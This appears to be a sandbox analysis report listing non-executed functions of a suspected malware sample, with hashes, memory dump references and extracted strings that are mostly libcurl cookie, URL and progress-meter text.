                                            • Opcode ID: 9b2183c9f70a40112a94ab722d5d616aeccdf5f5d4835f3c3f733f0b4345db59
                                            • Instruction ID: 5e8343852abd956de564364c688849d8ba49fb23138c5d9ab54ed8b956ad5662
                                            • Opcode Fuzzy Hash: 9b2183c9f70a40112a94ab722d5d616aeccdf5f5d4835f3c3f733f0b4345db59
                                            • Instruction Fuzzy Hash: 78D02BE36D8358F58A01E1DDD946966AE1BB55F138B31446FE1028B507E2CD08A8D163

                                            Non-executed Functions

                                            Function 00BD1BE0 Relevance: 33.9, Strings: 26, Instructions: 1418COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                            • API String ID: 0-1371176463
                                            • Opcode ID: 2b2f84fd7524805903261b680b8ca63d649bd26620ed177098bd822ac1b6d1dc
                                            • Instruction ID: 8dae755a47f9515d6478ef6223b6058144147f4642554fd4b00137ca4a5f4f5e
                                            • Opcode Fuzzy Hash: 2b2f84fd7524805903261b680b8ca63d649bd26620ed177098bd822ac1b6d1dc
                                            • Instruction Fuzzy Hash: 49B21671A083806BDB24AF24DD42B26FBD5EF64704F0889BEE88996382F771DC44D752
                                            Function 00BA4940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                            • API String ID: 0-122532811
                                            • Opcode ID: 2397bb9a28e6df4625ba2e007827214ab772bf0fac63c3b807884f1ec3fdd3a1
                                            • Instruction ID: 7c06f1e58a2d51aa613b14bd99a31623672b20f56b25526640f301a297ec1946
                                            • Opcode Fuzzy Hash: 2397bb9a28e6df4625ba2e007827214ab772bf0fac63c3b807884f1ec3fdd3a1
                                            • Instruction Fuzzy Hash: 6342F871B08700AFD718DE28CC81B6BB7E6EFC9700F04892CF58D97291E775A9148B92
                                            Function 00BA3ED0 Relevance: 15.7, Strings: 12, Instructions: 689COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                            • API String ID: 0-3977460686
                                            • Opcode ID: 639b8ca5b6aa351d4d2d7d966d6c5f01e85ab3e5663425af7934e91d0d695956
                                            • Instruction ID: a3e3d740b82921b6dd4cc0e5c802fc6bb6e9eb9ae69371eac64f7af27220ad01
                                            • Opcode Fuzzy Hash: 639b8ca5b6aa351d4d2d7d966d6c5f01e85ab3e5663425af7934e91d0d695956
                                            • Instruction Fuzzy Hash: 7C326BB1A0C3018BC724AE289C4131ABBD69FD7320F1547BDF9A59B3D2E7B4D9458782
                                            Function 00C49880 Relevance: 15.2, Strings: 12, Instructions: 226COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: -vc$ans$ate$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                            • API String ID: 0-1574211403
                                            • Opcode ID: 84b1acfdc95faf62c186e17283ece3db6e5a972c63a1c2cb1cb3258feb19d748
                                            • Instruction ID: 4b37c619211a73ec2b9cc3a6c27ca4e816f66836b18ae529f0a08a18914cd5fc
                                            • Opcode Fuzzy Hash: 84b1acfdc95faf62c186e17283ece3db6e5a972c63a1c2cb1cb3258feb19d748
                                            • Instruction Fuzzy Hash: 7C6108A5A083106BE714A624AC53B3BB6D9FBA4344F04843DFC4E97293FE71DE449253
                                            Function 00BB4F70 Relevance: 12.2, Strings: 9, Instructions: 911COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                            • API String ID: 0-1914377741
                                            • Opcode ID: c71ee754de940b29d7b7c23adf06793e36d9e1a03b17fd89bc3b911e0b12c548
                                            • Instruction ID: 117203e76467b7b540ff0fc866b047e374d8d99afa9e39480c5824541070dc03
                                            • Opcode Fuzzy Hash: c71ee754de940b29d7b7c23adf06793e36d9e1a03b17fd89bc3b911e0b12c548
                                            • Instruction Fuzzy Hash: 8A721830A08B419BE7359A18C5467F6B7D2DF91344F0886ACED855B292EBF6D884C783
                                            Function 00BA5DB0 Relevance: 10.1, Strings: 8, Instructions: 114COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
                                            • API String ID: 0-3476178709
                                            • Opcode ID: 7f09c27a536d00b0796cf1d0813d8f82d3bbafdfb132035d26a4d4d09fbb135f
                                            • Instruction ID: 812ee4c29b7d948b0acb5c3e90f9108171eed9e5989a88b9adfaabbc9272d41d
                                            • Opcode Fuzzy Hash: 7f09c27a536d00b0796cf1d0813d8f82d3bbafdfb132035d26a4d4d09fbb135f
                                            • Instruction Fuzzy Hash: 1831FD72B18A4876F73C1109DC86F3E209BC3CAB10F7AC27DB9069B2C2D8F59E4441A5
                                            Function 00C5EF90 Relevance: 9.4, Strings: 7, Instructions: 688COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $.$;$?$?$xn--$xn--
                                            • API String ID: 0-543057197
                                            • Opcode ID: 23995c10d4746b7d752c439aa8b7b97847364ec9b1457014a391a9851f39b9ff
                                            • Instruction ID: f993e919934dd19e9713c41ee2786bc95d8944b18513a8942b0d02391c8478fb
                                            • Opcode Fuzzy Hash: 23995c10d4746b7d752c439aa8b7b97847364ec9b1457014a391a9851f39b9ff
                                            • Instruction Fuzzy Hash: 782269B99043019BEB289A24DC81B6B77D4AFD034AF14443CFC9593292FB34DE8AC756
                                            Function 00F1E050 Relevance: 9.1, APIs: 1, Strings: 3, Instructions: 2082COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $d$nil)
                                            • API String ID: 0-394766432
                                            • Opcode ID: d592c40bb481d65c0a1db43547d2d0eedb1564ea35fadc3e9cc7f1caa96de9e3
                                            • Instruction ID: 6a5e5d3677fb9802ecf817584c7cb840c78561cb411b71fc0ea4cb3efde0c04c
                                            • Opcode Fuzzy Hash: d592c40bb481d65c0a1db43547d2d0eedb1564ea35fadc3e9cc7f1caa96de9e3
                                            • Instruction Fuzzy Hash: B2139F71A083418FD720CF28C5807AABBE1BFC9364F14492DE9959B351D775EC89EB42
                                            Function 00B9A960 Relevance: 9.0, Strings: 6, Instructions: 1493COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                            • API String ID: 0-2555271450
                                            • Opcode ID: ae87947b2fe1ad4a7393c862b4a6ad443caa360ce822437dccab0b17db86eaca
                                            • Instruction ID: 3c7d6b891b6e0c28a3cfdee95eab6b4083961bbae4fc218b12137f0b4e93eedc
                                            • Opcode Fuzzy Hash: ae87947b2fe1ad4a7393c862b4a6ad443caa360ce822437dccab0b17db86eaca
                                            • Instruction Fuzzy Hash: BFC27A316083418FCB18CF28D590B6AB7E2EFC9714F158ABDE8999B355D730ED458B82
                                            Function 00B9E620 Relevance: 8.5, Strings: 6, Instructions: 1028COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                            • API String ID: 0-2555271450
                                            • Opcode ID: 475c2124f8230c7a349fd0da4c5c54d293ac105e549aca8e85a008953439b8da
                                            • Instruction ID: 79dff306e709017e7f4dffaa93f1a791ec7f878858c3aa272275011020b77535
                                            • Opcode Fuzzy Hash: 475c2124f8230c7a349fd0da4c5c54d293ac105e549aca8e85a008953439b8da
                                            • Instruction Fuzzy Hash: 0F827D71A083029FDB14CE28C88172BB7E1EF85364F148ABDF8A997391D734DC458B92
                                            Function 00BF6210 Relevance: 7.9, Strings: 6, Instructions: 419COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
